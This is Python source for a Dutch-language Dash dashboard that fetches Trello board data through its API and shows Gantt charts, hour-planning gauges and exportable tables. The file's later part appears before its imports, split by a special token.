    # Gauge axis extends 20 beyond the larger of planned/available hours.
    if deltathismonth > gaugegeplandthismonth:
        gaugerangethismonth = deltathismonth + 20
    else:
        gaugerangethismonth = gaugegeplandthismonth + 20
    if deltanextmonth > gaugegeplandnextmonth:
        gaugerangenextmonth = deltanextmonth + 20
    else:
        gaugerangenextmonth = gaugegeplandnextmonth + 20
    if deltatwomonths > gaugegeplandtwomonths:
        gaugerangetwomonths = deltatwomonths + 20
    else:
        gaugerangetwomonths = gaugegeplandtwomonths + 20
    # Colour bands run green -> red as planned hours approach capacity;
    # the threshold line marks the available hours.
    gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
        'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *
        0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5,
        deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [
        deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
        {'range': [deltathismonth * 0.9, deltathismonth], 'color':
        '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],
        'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
        'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}
    gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
        'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *
        0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5,
        deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [
        deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
        {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':
        '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],
        'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
        'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}
    gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
        'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *
        0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5,
        deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [
        deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
        {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':
        '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],
        'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
        'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}
    gaugefig = go.Figure()
    gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},
        value=gaugegeplandthismonth, mode='gauge+number+delta', title={
        'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').
        strftime('%B')}, delta={'reference': deltathismonth}, gauge=
        gaugestepsthismonth))
    gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},
        value=gaugegeplandnextmonth, mode='gauge+number+delta', title={
        'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').
        strftime('%B')}, delta={'reference': deltanextmonth}, gauge=
        gaugestepsnextmonth))
    gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},
        value=gaugegeplandtwomonths, mode='gauge+number+delta', title={
        'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').
        strftime('%B')}, delta={'reference': deltatwomonths}, gauge=
        gaugestepstwomonths))
    gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
        'gaugefig': gaugefig}
    # Column-type hints for the DataTable filters, inferred from the first
    # card's values.
    columntypes = {}
    for key, value in kaarten[next(iter(kaarten))].items():
        if 'datum' in key or key == 'Aangemaakt':
            columntypes[key] = 'datetime'
        elif type(value) == int:
            columntypes[key] = 'numeric'
        # NOTE(review): `type(value in [str, bool])` is always truthy (it
        # is the type of a bool), so every remaining column gets 'text'.
        # Probably intended as `type(value) in [str, bool]`, but "fixing"
        # it would drop list/None-valued columns from the export tables.
        elif type(value in [str, bool]):
            columntypes[key] = 'text'
    columntypesurenpermaand = dict(columntypes)
    columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
    # Publish everything for the callbacks in one module-level dict.
    data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
        urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
        graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
        'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
        dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
    """Build the top-level page layout: banner, board selector and content stub."""
    banner_style = {
        'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',
        'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',
        'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',
        'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',
        'margin-left': '1%', 'border-radius': '10px', 'text-align': 'center'}
    title = html.Div(style={'display': 'inline-block', 'width': '80%'},
                     children=[html.H1('Trello borden USD')])
    logo = html.Div(style={'display': 'inline-block', 'margin-right': '1px'},
                    children=[html.Img(src=app.get_asset_url('logonop.png'),
                                       style={'width': '150px', 'margin-right': '0px'})])
    banner = html.Div(style=banner_style, className='Banner', children=[title, logo])
    board_options = [{'label': board['name'], 'value': board['id']} for board in boards]
    selector = dcc.Dropdown(id='dropdown_boards', options=board_options,
                            value=boards[0]['id'])
    return html.Div(className='First Div', children=[
        banner,
        html.H5('Kies hieronder een bord', style={'text-align': 'center'}),
        selector,
        html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),
        html.Div(id='test'),
    ])
# Third-party base stylesheet plus the Dutch Plotly locale bundle.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,
                external_scripts=external_scripts, url_base_pathname='/dash/')
# Assigning the function (not its result) makes Dash rebuild the layout on
# every page load.
app.layout = make_layout
# Callbacks target components that only exist after create_maindiv has run.
app.config['suppress_callback_exceptions'] = True
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'),
                                           Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
    """(Re)load board *value* from Trello and build the four content tabs.

    Fired when a board is chosen or the refresh button is clicked; calls
    get_data() for its side effect of rebuilding the module-level ``data``.
    """
    get_data(value)
    import os
    # '%-d' (no leading zero) is a glibc extension; Windows needs '%d'.
    if os.name == 'nt':
        daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
    else:
        daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
    return html.Div(className='', children=[
        dcc.Markdown('**Laatst ververst: **' + daterefreshed),
        dcc.Tabs(className='Tabs', children=[
            # --- Tab 1: Gantt charts per epic and per person ---------------
            dcc.Tab(label='Gantt charts', style=globals['styles']['tabs'], children=[
                html.Div(className='tab2_div1', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown('In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.')])]),
                html.Div(className='tab2_div2', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt per epic'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttepics',
                                 options=[{'label': name, 'value': name} for name in data['arrays']['epics']],
                                 value=[next(iter(data['arrays']['epics']))]),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='ganttepics')])]),
                html.Div(className='tab2_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt per persoon'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttpersoon',
                                 options=[{'label': name, 'value': name} for name in data['arrays'][config.get('Custom Field for Person')]]),
                    # Status filter, all statuses selected by default.
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttpersoonstatus',
                                 options=[{'label': name, 'value': name} for name in data['arrays']['statuses']],
                                 value=data['arrays']['statuses'], multi=True),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]),
            # --- Tab 2: filterable tables with Excel export ----------------
            dcc.Tab(label='Data export', style=globals['styles']['tabs'], children=[
                html.Div(className='tab3_div1', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown("Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."),
                        dcc.Markdown("In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.")])]),
                html.Div(className='tab3_div2', style=globals['styles']['maindivs'], children=[
                    html.H4('Platte dump'),
                    dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
                    # All typed columns start hidden; the user toggles them on.
                    dash_table.DataTable(
                        id='table_plattedump',
                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True}
                                 for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],
                        data=data['dfs']['kaartendf'].to_dict('records'),
                        hidden_columns=[i for i in data['dfs']['columntypes']],
                        export_format='xlsx', export_headers='display', export_columns='all',
                        filter_action='native', sort_action='native', sort_mode='multi',
                        style_table={'overflowX': 'scroll'},
                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
                                      'fontWeight': 'bold', 'fontFamily': 'Arial'},
                        style_cell={'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
                                    'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
                html.Div(className='tab3_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Uren per maand'),
                    dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),
                    dcc.Markdown('Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'),
                    dash_table.DataTable(
                        id='table_urenpermaand',
                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True}
                                 for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],
                        data=data['dfs']['urenpermaand'].to_dict('records'),
                        hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],
                        export_format='xlsx', export_headers='display', export_columns='all',
                        filter_action='native', sort_action='native', sort_mode='multi',
                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
                                      'fontWeight': 'bold', 'fontFamily': 'Arial'},
                        style_cell={'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
                                    'text-align': 'left', 'fontFamily': 'Arial'})])]),
            # --- Tab 3: long-term planning per category --------------------
            dcc.Tab(label='Langetermijnplanning', style=globals['styles']['tabs'], children=[
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown('In dit tabblad wordt een langetermijnplanning getoond.'),
                        dcc.Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Ingeplande uren per categorie'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
                                 options=[{'label': name, 'value': name}
                                          for name in data['arrays'][config.get('Custom Field for Categories')] if name != None],
                                 multi=True, searchable=False,
                                 value=data['arrays'][config.get('Custom Field for Categories')]),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='urenpermaand')])]),
                html.Div(className='tab1_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Nog in te plannen uren (per lijst)'),
                    dcc.Markdown('*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'),
                    dcc.Markdown('*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'),
                    dcc.Markdown('*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'),
                    dcc.Markdown('**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(id='graph_nietingepland',
                                  figure={'data': data['graphdata']['nietingepland'],
                                          'layout': globals['graphlayouts']['bars']})])]),
                html.Div(className='tab1_div4', style=globals['styles']['maindivs'], children=[
                    html.H4('Nog in te plannen uren (per epic)'),
                    dcc.Markdown('**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(id='graph_nietingepland_epics',
                                  figure={'data': data['graphdata']['nietingeplandepics'],
                                          'layout': globals['graphlayouts']['bars']})])])]),
            # --- Tab 4: tactical (three-month) planning --------------------
            dcc.Tab(style=globals['styles']['tabs'], label='Tactische planning', children=[
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    dcc.Markdown('In dit tabblad is een middellange termijnplanning te zien.')]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Totalen'),
                    dcc.Markdown('Hieronder staan twee totaaloverzichten van de aankomende maanden.'),
                    dcc.Markdown('De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'),
                    dcc.Markdown('Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(figure=data['graphdata']['gaugefig'])])]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt'),
                    # threemonths holds ('YYYYMM', localized month name) pairs.
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdowngantttactisch',
                                 options=[{'label': j, 'value': i} for i, j in data['arrays']['threemonths']],
                                 multi=False, searchable=False,
                                 value=data['arrays']['threemonths'][0][0]),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(id='gantttactisch')])])])])])
@app.callback(Output('gantttactisch', 'figure'), [Input(
    'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
    """Render the tactical-planning Gantt for the 'YYYYMM' month *v1*.

    Cards with status 'Niet gestart', 'Doing' or 'Blocked' whose date range
    covers the selected month are drawn, clipped to the window
    [month-1, month+2); two vertical black lines mark the start of the
    selected month and of the next month. Returns an empty transparent
    placeholder figure while nothing is selected (v1 is None).
    """
    def _shift_month(yyyymm, delta):
        # 'YYYYMM' +/- delta months with correct year rollover.
        # BUG FIX: the old ad-hoc string arithmetic produced invalid months
        # such as '202014' for December + 2; strptime then raised inside the
        # per-card bare except, silently emptying the chart every December.
        total = int(yyyymm[0:4]) * 12 + int(yyyymm[4:6]) - 1 + delta
        return '%04d%02d' % (total // 12, total % 12 + 1)

    if v1 is None:
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}

    import numpy as np
    from operator import itemgetter

    v1plus1 = _shift_month(v1, 1)
    v1min1 = _shift_month(v1, -1)
    v1plus2 = _shift_month(v1, 2)
    window_start = datetime.strptime(v1min1 + '01', '%Y%m%d').date()
    window_end = datetime.strptime(v1plus2 + '01', '%Y%m%d').date()

    ganttdata = []
    monthkey = int(v1)
    for j in data['kaarten'].values():
        if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
            try:
                if (int(datetime.strftime(j['Begindatum'], '%Y%m')) <= monthkey
                        <= int(datetime.strftime(j['Einddatum'], '%Y%m'))):
                    # Clip the bar to the three-month display window.
                    start = max(j['Begindatum'].date(), window_start)
                    eind = min(j['Einddatum'].date(), window_end)
                    uren = round(data['urenperdagperkaart'][j['Naam']]['urenperperiode'][v1])
                    ganttdata.append(dict(Task=j['Epic'], Start=start, Finish=eind,
                                          Resource=j['Naam'] + ' (uren: ' + str(uren) + ')'))
            except Exception:
                # Cards without Begindatum/Einddatum are skipped on purpose.
                pass
    result = sorted(ganttdata, key=itemgetter('Task'))
    # One random RGB colour per bar so adjacent resources stay distinguishable.
    rgb = ['rgb(' + ','.join(map(str, np.random.choice(range(256), size=3))) + ')'
           for _ in result]
    fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True,
                          group_tasks=False, showgrid_x=True, showgrid_y=True,
                          colors=rgb)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')
    # Vertical markers at the first day of the selected and the next month.
    for month in (v1, v1plus1):
        marker = month[0:4] + '-' + month[4:] + '-01'
        fig.add_trace(go.Scatter(mode='lines', x=[marker, marker],
                                 y=[-1, len(result)],
                                 line={'shape': 'spline', 'color': 'black', 'width': 4},
                                 showlegend=False))
    return fig
@app.callback(Output('ganttpersoon', 'figure'), [Input(
    'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
    'value')])
def update_ganttpersoon(v1, v2):
    """Gantt chart of all non-archived cards assigned to person *v1*.

    *v2* is the list of statuses ticked in the status dropdown; only cards
    whose status is in that list are drawn. Cards missing a start or end
    date are silently skipped.
    """
    person_field = config.get('Custom Field for Person')
    start_field = config.get('Custom Field for Starting date')
    end_field = config.get('Custom Field for Ending date')
    tasks = []
    for card in data['kaarten'].values():
        if card[person_field] != v1 or card['Status'] == 'Archived' or card['Status'] not in v2:
            continue
        try:
            tasks.append(dict(Task=card['Naam'], Start=card[start_field].date(),
                              Finish=card[end_field].date(), Resource=card['Epic']))
        except:  # card lacks a start/end date -> leave it out of the chart
            pass
    if not tasks:
        # No matching cards: transparent empty placeholder figure.
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(tasks, index_col='Resource', show_colorbar=True,
                          showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')
    return fig
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
    'value')])
def update_ganttepics(value):
    """Gantt chart of every non-archived card belonging to epic *value*,
    coloured by card status. Cards without both dates are skipped."""
    start_field = config.get('Custom Field for Starting date')
    end_field = config.get('Custom Field for Ending date')
    tasks = []
    for card in data['kaarten'].values():
        if card['Epic'] != value or card['Status'] == 'Archived':
            continue
        try:
            tasks.append(dict(Task=card['Naam'], Start=card[start_field].date(),
                              Finish=card[end_field].date(), Resource=card['Status']))
        except:  # missing start/end date -> skip the card
            pass
    if not tasks:
        # Nothing to draw: transparent empty placeholder figure.
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(tasks, index_col='Resource', show_colorbar=True,
                          showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')
    return fig
@app.callback(Output('urenpermaand', 'figure'), [Input(
    'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
    """Stacked line chart of planned hours per month for the selected categories.

    *value* is the list of categories ticked in the dropdown. 'Regulier werk'
    is always drawn as the first (bottom) trace when selected; a thick black
    line on top shows the total available hours per month.
    """
    category_field = config.get('Custom Field for Categories')
    months = data['arrays']['xaxis_months']
    perioden = data['arrays']['perioden']

    def planned_per_month(category):
        # Summed planned hours per period over all cards in *category*.
        return [round(sum(card['urenperperiode'][periode]
                          for card in data['urenperdagperkaart'].values()
                          if card[category_field] == category), 0)
                for periode in perioden]

    def stacked_trace(label, yaxis):
        return dict(x=months, y=yaxis, name=label,
                    line={'shape': 'spline', 'smoothing': 0.4},
                    mode='lines+markers',
                    marker={'symbol': 'triangle-up-open', 'size': 10},
                    stackgroup='one')

    bars = []
    if 'Regulier werk' in value:
        bars.append(stacked_trace('Regulier werk', planned_per_month('Regulier werk')))
    for categorie in data['arrays'][category_field]:
        if categorie in value and categorie != 'Regulier werk':
            label = 'Geen categorie' if categorie is None else categorie
            bars.append(stacked_trace(label, planned_per_month(categorie)))
    # Capacity line on top of the stack.
    available = [round(sum(card['urenperperiode'][periode]
                           for card in data['beschikbareuren'].values()), 0)
                 for periode in perioden]
    bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=months,
                     y=available, size=10,
                     line={'shape': 'spline', 'smoothing': 0.3, 'width': 6,
                           'color': 'black'}))
    layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)',
                       xaxis={'title': 'Datum', 'gridcolor': 'gray'},
                       yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})
    return {'data': bars, 'layout': layout}
@app.server.route('/dash/configuration/')
def download_file():
    """Serve the raw configuration file as a download (caching disabled)."""
    config_path = './configuration/configuration.txt'
    return flask.send_file(config_path,
                           attachment_filename='configuration.txt',
                           as_attachment=True, cache_timeout=0)
# Run the Dash development server when executed directly; listens on all
# interfaces on port 8050 (the app is mounted under /dash/).
if __name__ == '__main__':
    app.run_server(debug=False, host='0.0.0.0', port=8050)
<|reserved_special_token_1|>
import os, json, locale, requests, dash, dash_table, copy, time, flask, base64
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import pandas as pd
from os import listdir
import plotly.figure_factory as ff
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from dash.dependencies import Input, Output
from datetime import date, datetime, timedelta, time
from dateutil.relativedelta import relativedelta
# Credentials (Trello API key/token) and per-board configuration are
# generated by deploy.py; both files contain JSON despite the .txt extension.
try:
    with open('./configuration/credentials.txt') as json_file:
        credentials = json.load(json_file)
    with open('./configuration/configuration.txt') as json_file:
        config = json.load(json_file)
except (OSError, ValueError) as err:
    # Missing or malformed files: point the user at the bootstrap script.
    # ValueError covers json.JSONDecodeError; previously a bare `except:`
    # also swallowed KeyboardInterrupt/SystemExit.
    raise Exception('Draai eerst deploy.py!') from err
# Dutch locale so month names render in Dutch throughout the dashboard.
# NOTE(review): rebinding the name 'locale' to setlocale()'s return value
# shadows the imported locale module — confirm nothing below needs locale.*.
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')
# App-wide shared state: config, credentials and reusable style dicts.
# NOTE(review): the name 'globals' shadows the builtin globals().
globals = {'config': config, 'credentials': credentials, 'styles': {}}
# Fetch the boards visible to this token (id + name only).
board_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +
    credentials.get('API key') + '&token=' + credentials.get('API token'))
# NOTE(review): no timeout on this request — app start blocks if Trello is
# unreachable.
boards = json.loads(json.dumps(requests.get(board_url).json()))
globals['boards'] = boards
# Shared CSS snippets for the main content blocks.
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
    'background-image': "url('./assets/left.png')", 'background-repeat':
    'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',
    'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',
    'text-align': 'center', 'border-radius': '10px'}
# NOTE(review): 'background' appears twice below; Python keeps only the last
# duplicate dict key, so the plain rgb() fallback is never emitted.
globals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',
    'background': 'rgb(255,255,255)', 'background':
    'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'
    , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',
    'margin-left': '5px', 'border-radius': '6px'}
globals['styles']['divgraphs'] = {'background-color':
    'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',
    'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',
    'border-radius': '10px'}
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
# Transparent stacked-bar layout reused by several graphs.
globals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor
    ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
def get_data(value):
    """Fetch Trello board *value* and rebuild the module-level ``data`` dict.

    Downloads cards, lists, custom fields and members through the Trello
    REST API, flattens every card into a plain dict (``kaarten``), derives
    planned/available hours per day and per month, and pre-builds the
    figures and dataframes consumed by the Dash callbacks.
    Side effects: rebinds the module globals ``data`` and ``config``.
    """
    global data
    global config
    # Board-specific configuration: list names and custom-field names.
    with open('./configuration/configuration.txt') as json_file:
        configfile = json.load(json_file)
    config = configfile.get(value)

    # ---- Trello REST calls -------------------------------------------------
    keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
        'API token')
    trello_base_url = 'https://api.trello.com/1/'
    board_url = trello_base_url + 'boards/' + value
    url_cards = (board_url +
        '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
        + keys)
    url_lists = board_url + '/lists?filter=all&' + keys
    url_customfields = board_url + '/customFields?' + keys
    url_labels = board_url + '/labels?' + keys
    url_members = board_url + '/members?' + keys
    board = json.loads(json.dumps(requests.get(url_cards).json()))
    lists = json.loads(json.dumps(requests.get(url_lists).json()))
    customfields = json.loads(json.dumps(requests.get(url_customfields).json()))
    labels = json.loads(json.dumps(requests.get(url_labels).json()))  # fetched but currently unused
    members = json.loads(json.dumps(requests.get(url_members).json()))
    cards = board['cards']

    def dateCalc(date):
        # Parse Trello's ISO timestamp; None when absent or malformed.
        try:
            return datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
        except Exception:
            return None

    # ---- Custom-field metadata: {type: {fieldId: {...}}} -------------------
    customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
        'checkbox': {}}
    for i in customfields:
        customfields_dict[i['type']] = {}
    for i in customfields:
        customfields_dict[i['type']][i['id']] = {}
    for i in customfields:
        if i['type'] == 'list':
            customfields_dict[i['type']][i['id']]['name'] = i['name']
            customfields_dict['list'][i['id']]['options'] = {}
            for j in i['options']:
                # Map option id -> display text for dropdown-type fields.
                customfields_dict['list'][i['id']]['options'][j['id']] = j[
                    'value'].get('text')
        else:
            customfields_dict[i['type']][i['id']]['name'] = i['name']

    # Lists we keep; cards on any other list are dropped further down.
    chosenlists = []
    for i in config.get('Not Started'):
        chosenlists.append(i)
    chosenlists.extend(config.get('Blocked'))
    chosenlists.extend(config.get('Doing'))
    chosenlists.extend(config.get('Done'))
    for i in config.get('Epics'):
        chosenlists.append(i)
    for i in config.get('Always continuing'):
        chosenlists.append(i)
    for i in config.get('List with Epics Done'):
        chosenlists.append(i)

    def idtodate(cardid):
        # The first 8 hex chars of a Trello id encode the creation timestamp.
        timestamp = int(cardid[0:8], 16)
        return datetime.fromtimestamp(timestamp)

    def get_epicid(url):
        # Extract the epic id from an Epic power-up attachment URL, else None.
        try:
            if 'epicId=' in url:
                start = url.find('epicId=') + 7
                end = url.find('&attachmentId=')
                return url[start:end]
        except Exception:
            pass

    # ---- Flatten cards into plain dicts ------------------------------------
    kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
        ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
        idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
        ] if i['labels'] != []], 'members': [member['fullName'] for member in
        members if member['id'] in i['idMembers']], 'Sjabloon': i[
        'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
        ['closed'], 'epicid': [get_epicid(j['url']) for j in i[
        'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
        cards}
    for i, j in kaarten.items():
        while None in j['epicid']:
            j['epicid'].remove(None)
        # Collapse member names into a single comma-separated 'Leden' string.
        j['Leden'] = ', '.join(j['members']) if j['members'] != [] else None
        del j['members']
    # Give every card a (None) slot for every custom field on the board.
    if customfields_dict != {}:
        for i, j in customfields_dict.items():
            for k, l in j.items():
                for m, n in kaarten.items():
                    n[l['name']] = None
    # Fill in the custom-field values each card actually has.
    for i, j in kaarten.items():
        for k in j['customfields']:
            if k['idCustomField'] in customfields_dict['list'].keys():
                j[customfields_dict['list'][k['idCustomField']].get('name')
                    ] = customfields_dict['list'][k['idCustomField']][
                    'options'].get(k['idValue'])
            elif k['idCustomField'] in customfields_dict['checkbox'].keys():
                # Trello serializes checkbox values as the string 'true'.
                j[customfields_dict['checkbox'][k['idCustomField']].get(
                    'name')] = k['value']['checked'] == 'true'
            elif k['idCustomField'] in customfields_dict['date'].keys():
                j[customfields_dict['date'][k['idCustomField']].get('name')
                    ] = dateCalc(k['value'].get('date'))
            else:
                for key in k['value']:
                    j[customfields_dict[key][k['idCustomField']].get(
                        'name')] = k['value'].get(key)
    # ---- Resolve epic links (cards attach their epic card's URL) -----------
    epicIdNameCategory = []
    for i, j in kaarten.items():
        epicIdNameCategory.append((i, j['Naam'], j[config.get(
            'Custom Field for Categories')]))
    for i, j in kaarten.items():
        if j['epicid'] == []:
            j['Epic'] = 'Geen epic'
            j['Categorie'] = None
        else:
            for k in epicIdNameCategory:
                if k[0] == j['epicid'][0]:
                    j['Epic'] = k[1]
                    j['Categorie'] = k[2]
        del j['epicid']
    # ---- Map list id -> list name -> status --------------------------------
    for i, j in kaarten.items():
        for k in lists:
            if j['ListID'] == k['id']:
                j['Lijst'] = k['name']
